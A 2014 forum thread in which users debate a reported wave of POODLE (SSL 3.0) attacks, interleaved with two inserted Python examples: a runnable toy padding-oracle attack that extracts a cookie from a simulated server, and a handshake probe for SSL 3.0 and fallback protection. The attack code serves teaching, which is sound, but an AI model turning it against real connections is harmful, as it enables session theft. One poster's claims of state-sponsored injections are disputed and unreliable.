Poodle attacks on Chrome-based browsers.

Discussion in 'other software & services' started by Mayahana, Nov 10, 2014.

  1. Mayahana

    Mayahana Banned

    Joined:
    Sep 13, 2014
    Posts:
    2,220
    I came home today and noticed over 2200 Poodle attacks on my network. My UTM got pushed an IPS patch automatically to stop Poodle attacks, but what about people without UTMs? Since everyone in the home uses Chrome (fully updated), I am going to assume these were directed at Chrome. See attached screenshot. The one with 2259 attacks is Poodle. CVE-2014-3566

    Why hasn't Chrome patched this yet? I noticed Firefox apparently won't be patching it out until the end of November. But clearly, based on my UTM's alerts today, this issue is more critical than these browser firms are taking it.

    Apparently you can command-line Poodle (SSL3) out with Chrome:

    https://productforums.google.com/forum/#!topic/chrome/dpiPu9B1cBI
     

  2. Minimalist

    Minimalist Registered Member

    Joined:
    Jan 6, 2014
    Posts:
    5,066
    Maybe there is no attack and your UTM just blocks all SSL3 connections?
     
  3. Yuki2718

    Yuki2718 Registered Member

    Joined:
    Aug 15, 2014
    Posts:
    1,257
    I second Simplicity.
    What do you mean by 'patch'?
    POODLE is a vulnerability in the SSL 3.0 protocol (with CBC encryption), and there can't be a direct patch.
    What a browser vendor can do is at most minimize the risk of a 'downgrade' of the TLS protocol, and Google already did it by supporting TLS_FALLBACK_SCSV.

    I think so far POODLE is not widely used in the real world, and these will more likely be a kind of FP. Possibly your UTM just detected a downgrade request from your machine, which can also occur in a usual HTTPS connection, or maybe more complicated FPs...

    Note POODLE is not remotely exploitable.
    The attacker has to make your browser send HTTPS requests hundreds of times with a slightly modified header for each request; it is possible only when he has already intruded by e.g. a code execution vulnerability.
    Also the attacker has to intervene in the connection between your browser and the server, but that is usually done on public wifi.

    Considering you have quite robust layered protection and are on a home network, it's unlikely they are real attacks.
     
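The padding flaw Yuki2718 describes, worked through as a toy model. This is an added example, not code from the thread: the block cipher is a deliberately weak toy (any keyed 16-byte bijection shows the CBC property the attack relies on) and HMAC-SHA1 stands in for the SSL 3.0 MAC; `ToyCipher`, `SSL3Record`, `browser_request`, `recover_secret` and the constructed `SECRET` cookie are all names assumed here. The "browser" is the attacker's script choosing request lengths around a cookie it cannot read, and the "MITM" is the loop that swaps ciphertext blocks and watches whether the server accepts the record.

```python
"""Toy model of the SSL 3.0 CBC padding flaw behind POODLE (CVE-2014-3566).

Added example, not code from the thread. ToyCipher is NOT a real cipher; it is
a key-derived 16-byte bijection, which is all CBC chaining needs for the effect.
"""
import hashlib
import hmac
import os
import random

BLOCK = 16
MAC_LEN = 20
SECRET = b"session=s3cr3t"      # constructed stand-in for the cookie the attacker wants


class ToyCipher:
    """4 rounds of key XOR, key-derived byte substitution and a byte rotation. Toy only."""

    def __init__(self, key):
        box = list(range(256))
        random.Random(key).shuffle(box)                  # key-derived S-box (toy)
        self.sbox = bytes(box)
        self.inv = bytes(box.index(i) for i in range(256))
        self.key = key[:BLOCK]

    def encrypt_block(self, b):
        for _ in range(4):
            b = bytes(self.sbox[x ^ k] for x, k in zip(b, self.key))
            b = b[3:] + b[:3]
        return b

    def decrypt_block(self, b):
        for _ in range(4):
            b = b[-3:] + b[:-3]
            b = bytes(self.inv[x] ^ k for x, k in zip(b, self.key))
        return b


def cbc_encrypt(cipher, iv, pt):
    out, prev = [], iv
    for i in range(0, len(pt), BLOCK):
        prev = cipher.encrypt_block(bytes(a ^ b for a, b in zip(pt[i:i + BLOCK], prev)))
        out.append(prev)
    return b"".join(out)


def cbc_decrypt(cipher, iv, ct):
    out, prev = [], iv
    for i in range(0, len(ct), BLOCK):
        blk = ct[i:i + BLOCK]
        out.append(bytes(a ^ b for a, b in zip(cipher.decrypt_block(blk), prev)))
        prev = blk
    return b"".join(out)


class SSL3Record:
    """Both ends of one SSL 3.0 connection. A record is plaintext || MAC || padding and
    the receiver checks ONLY the final pad-length byte before stripping the padding."""

    def __init__(self, key):
        self.cipher, self.mac_key = ToyCipher(key), key

    def _mac(self, data):
        return hmac.new(self.mac_key, data, hashlib.sha1).digest()

    def seal(self, data):
        pad_len = (BLOCK - (len(data) + MAC_LEN + 1) % BLOCK) % BLOCK
        padding = os.urandom(pad_len) + bytes([pad_len])   # SSL 3.0 pad bytes are arbitrary
        iv = os.urandom(BLOCK)
        return iv + cbc_encrypt(self.cipher, iv, data + self._mac(data) + padding)

    def open(self, record):
        """True if the record is accepted. This accept/reject signal is the oracle."""
        pt = cbc_decrypt(self.cipher, record[:BLOCK], record[BLOCK:])
        pad_len = pt[-1]
        if pad_len >= BLOCK:
            return False                                   # the only padding check SSL 3.0 makes
        body = pt[:len(pt) - pad_len - 1]
        return hmac.compare_digest(body[-MAC_LEN:], self._mac(body[:-MAC_LEN]))


def browser_request(conn, prefix_len, secret):
    """What the attacker's script makes the victim browser send: attacker-chosen path
    (prefix) and body (suffix) lengths around a cookie the script cannot read."""
    suffix_len = (12 - (prefix_len + len(secret))) % BLOCK       # data+MAC fill whole blocks,
    return conn.seal(b"A" * prefix_len + secret + b"B" * suffix_len)  # so padding is one full block


def recover_secret(conn, secret, nbytes, max_tries=20000):
    """MITM side: copy the block ending in the target byte over the all-padding last
    block; the server accepts iff that byte decrypts to 15 (about 1 try in 256)."""
    out = bytearray()
    for i in range(nbytes):
        prefix_len = BLOCK + (BLOCK - 1 - i % BLOCK)      # aligns secret[i] to a block end
        t = (prefix_len + i) // BLOCK                     # plaintext block holding it
        for _ in range(max_tries):
            rec = browser_request(conn, prefix_len, secret)
            blocks = [rec[k:k + BLOCK] for k in range(0, len(rec), BLOCK)]  # blocks[0] = IV
            forged = b"".join(blocks[:-1] + [blocks[t + 1]])
            if conn.open(forged):
                out.append(15 ^ blocks[t][-1] ^ blocks[-2][-1])   # P[t][15] = 15 ^ C[t-1][15] ^ C[n-1][15]
                break
        else:
            raise RuntimeError("oracle never accepted a forged record")
    return bytes(out)


if __name__ == "__main__":
    print(recover_secret(SSL3Record(os.urandom(32)), SECRET, len(SECRET)))
```

Run stand-alone it prints the cookie back, one byte per roughly 256 requests. Nothing in the server's code is buggy in the usual sense: it implements SSL 3.0's padding rule exactly, which is why the only fixes are refusing SSL 3.0 or refusing the downgrade to it, and why the attack needs both script execution in the victim's browser and a man-in-the-middle position.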
  4. Minimalist

    Minimalist Registered Member

    Joined:
    Jan 6, 2014
    Posts:
    5,066
    I agree. It would be nice if Google offered protocol selection in advanced settings (similar to IE) or through chrome://flags.
     
  5. Peter2150

    Peter2150 Global Moderator

    Joined:
    Sep 20, 2003
    Posts:
    17,046
    There is an add on for Firefox that stops poodle attacks, so Firefox is covered.
     
  6. Mayahana

    Mayahana Banned

    Joined:
    Sep 13, 2014
    Posts:
    2,220
    Everyone has 'some' method. IE: you change a setting. Chrome: you need to add a command line modifier to the icon. Firefox: you can edit a config or use an addon.

    It's serious; I am unsure why none of these companies have patched for it.
     
  7. Minimalist

    Minimalist Registered Member

    Joined:
    Jan 6, 2014
    Posts:
    5,066
    They can't "patch" the SSL3 protocol. They can only disable its usage...
     
  8. Mayahana

    Mayahana Banned

    Joined:
    Sep 13, 2014
    Posts:
    2,220
    I'm aware of how encryption works; the term patch is used liberally here, meaning releasing versions defaulting it to OFF with an option to turn it ON. It's a pretty serious issue, and their actions towards it seem slow. Disabling the fallback below TLS solves it fairly quickly, but anyone (the masses) not doing the tweaks is vulnerable for a bit longer than I feel comfortable with.
     
  9. gorhill

    gorhill Developer

    Joined:
    Nov 12, 2013
    Posts:
    747
    Location:
    Canada
    Could this be linked to your use of Adguard? With malware/phishing turned on, Adguard will send the hostname of sites you visit the first time they are encountered (reset after a timeout expires) to "sb.adtidy.org", typically in the form "https://sb.adtidy.org/safebrowsing-lookup-domain.html?domain=www.google.ca&ip=173.194.43.111"

    If you check "sb.adtidy.org" with Qualys SSL Labs, you get "This server uses SSL 3, with POODLE mitigated"
     
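A way to check at the handshake level what gorhill's SSL Labs line is reporting, as an added example that is not code from the thread or from Qualys. It builds raw ClientHello records without a TLS library (so SSL 3.0 can be offered even where the local stack refuses to), classifies the server's first reply, and combines a plain SSL 3.0 probe with one carrying TLS_FALLBACK_SCSV into a verdict. `build_client_hello`, `classify_response`, `assess`, `probe` and the constructed replies are names and data assumed here; `probe()` needs a live host, everything else runs offline. The "SCSV honoured" verdict is, as I read it, the case SSL Labs shows as "uses SSL 3, with POODLE mitigated".

```python
"""Handshake-level SSL 3.0 / TLS_FALLBACK_SCSV probe.

Added example, not code from the thread. Record and handshake layouts follow
RFC 6101 / RFC 5246; the SCSV value follows RFC 7507.
"""
import os
import socket
import struct

SSL3, TLS1_0, TLS1_2 = 0x0300, 0x0301, 0x0303
TLS_FALLBACK_SCSV = 0x5600                          # signalling cipher suite value
SUITES = [0x002F, 0x0035, 0x000A]                   # RSA with AES-128-CBC, AES-256-CBC, 3DES-CBC
ALERT_NAMES = {40: "handshake_failure", 70: "protocol_version", 86: "inappropriate_fallback"}


def build_client_hello(version, fallback=False):
    """One TLS record holding a minimal ClientHello advertising `version`.
    With fallback=True the SCSV is appended, as a client does on a downgraded retry."""
    suites = SUITES + ([TLS_FALLBACK_SCSV] if fallback else [])
    body = struct.pack("!H", version) + os.urandom(32) + b"\x00"       # version, random, no session id
    body += struct.pack("!H", 2 * len(suites)) + b"".join(struct.pack("!H", s) for s in suites)
    body += b"\x01\x00"                                                 # one compression method: null
    handshake = b"\x01" + struct.pack("!I", len(body))[1:] + body       # HandshakeType client_hello
    return b"\x16" + struct.pack("!HH", version, len(handshake)) + handshake


def classify_response(data):
    """Classify the first record a server sends back to a ClientHello."""
    if len(data) < 5:
        return ("other", None)                                          # closed or empty reply
    ctype, rec_len = data[0], struct.unpack("!H", data[3:5])[0]
    payload = data[5:5 + rec_len]
    if ctype == 0x15 and len(payload) >= 2:                             # alert record
        return ("alert", ALERT_NAMES.get(payload[1], "alert_%d" % payload[1]))
    if ctype == 0x16 and len(payload) >= 6 and payload[0] == 0x02:      # handshake: ServerHello
        return ("server_hello", struct.unpack("!H", payload[4:6])[0])
    return ("other", ctype)


def assess(plain_ssl3_reply, scsv_ssl3_reply):
    """Verdict from two SSL 3.0 probes: one plain, one carrying TLS_FALLBACK_SCSV."""
    if classify_response(plain_ssl3_reply) != ("server_hello", SSL3):
        return "SSL 3.0 disabled"
    if classify_response(scsv_ssl3_reply) == ("alert", "inappropriate_fallback"):
        return "SSL 3.0 enabled, SCSV honoured: downgrade blocked for SCSV-aware clients only"
    return "SSL 3.0 enabled, SCSV ignored: any client can be downgraded"


def probe(host, port=443, version=SSL3, fallback=False, timeout=5.0):
    """Send one ClientHello to a live server and return its first reply (needs network)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_client_hello(version, fallback))
        return s.recv(4096)


def sample_server_hello(version, suite=0x002F):
    """Constructed ServerHello record for the offline demo (not captured traffic)."""
    body = struct.pack("!H", version) + bytes(32) + b"\x00" + struct.pack("!H", suite) + b"\x00"
    handshake = b"\x02" + struct.pack("!I", len(body))[1:] + body
    return b"\x16" + struct.pack("!HH", version, len(handshake)) + handshake


SAMPLE_FALLBACK_ALERT = bytes.fromhex("15030000020256")   # fatal(2) inappropriate_fallback(86), constructed

if __name__ == "__main__":
    # Offline: a server that still answers SSL 3.0 but rejects the SCSV'd retry.
    print(assess(sample_server_hello(SSL3), SAMPLE_FALLBACK_ALERT))
    # Live: print(assess(probe("example.test"), probe("example.test", fallback=True)))
```

Two things the verdict makes explicit that the thread circles around: a server honouring the SCSV only protects clients that send it (Chrome did, per Yuki2718; older clients do not), and a UTM that simply drops every SSL 3.0 ClientHello will log the plain probe as an "attack" whether or not anyone is attacking.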
  10. Mayahana

    Mayahana Banned

    Joined:
    Sep 13, 2014
    Posts:
    2,220
    Possibly. But enforcing TLS and dropping SSL3 fixed it. But 2200 would be a little light if Adguard was doing it, given the traffic at home.
     
  11. Kirk Reynolds

    Kirk Reynolds Registered Member

    Joined:
    May 8, 2011
    Posts:
    224
  12. Mayahana

    Mayahana Banned

    Joined:
    Sep 13, 2014
    Posts:
    2,220
    Interesting link. My worry is people without UTMs were essentially left wide open to this vulnerability, right? I know ZyXEL and Fortinet patched the vulnerability at the UTM level a couple of weeks ago with IPS signature updates. But Joe Schmoe home guy may have had compromises? Considering I've now blocked close to 5,000 Poodle exploits this week so far, it makes me wonder.
     
  13. Minimalist

    Minimalist Registered Member

    Joined:
    Jan 6, 2014
    Posts:
    5,066
    The attacker still has to launch a MITM attack to exploit this vulnerability, so I don't think a regular user should worry too much. Maybe using open Wifi is not very secure, but using a home network should be relatively safe. I also doubt that you blocked that many exploits, except if somebody hacked your cable between your home and your ISP. It was probably 5000 SSL3 dropped connections. But that doesn't mean there were any exploits...
     
    Last edited: Nov 11, 2014
  14. Minimalist

    Minimalist Registered Member

    Joined:
    Jan 6, 2014
    Posts:
    5,066
    More info: https://www.us-cert.gov/ncas/alerts/TA14-290A

     
  15. Mayahana

    Mayahana Banned

    Joined:
    Sep 13, 2014
    Posts:
    2,220
    My home network routinely comes under attack, state sponsored or otherwise. Even some Quantum injections, from what we have found and have been told. I assume a combination of factors results in fairly aggressive surveillance of myself/my network/systems, to which I DO take very nearly extreme precautions to avoid compromises. Not many folks drop double Layer-7 UTMs on their networks. Anyway;

    1) Past Military, Defense Contractor, etc.
    2) Past work with Russian firms. :isay:
    3) Current IT work with high-value-targets (CEOs, Presidents, some famous folks)
    4) Past IT work securing privacy for some well connected folks.

    Ironically I use Russian gear to maintain network integrity at the front end, and US gear on the backend. I've had engineers from some AV companies, ZyXEL, and others watching in realtime the pretty intense intrusion activity. Hopefully my stacked UTMs will take care of the worst stuff, and if anything sneaks in it has to deal with more layers and encrypted personal data. Right now the biggest issue is the quantum injections. My ISP won't fess up to it, and passes the buck, but admits it is happening. For every HTTP call to keyworded pages we get 1-3 Fraudloader packets injected, 'fishing' for holes. I suppose since the Russian gear is snagging them I am not too worried, but it's pretty annoying because this is at the backbone or ISP level. No guarantee switching ISPs will fix it.

    44-hour UTM statistics on my HOME network (incoming from WAN only):

    16,600 Viruses Intercepted
    12,100 Packets Rejected/Dropped
    11,300 Intrusions Intercepted
     
  16. ArchiveX

    ArchiveX Registered Member

    Joined:
    Apr 7, 2014
    Posts:
    1,016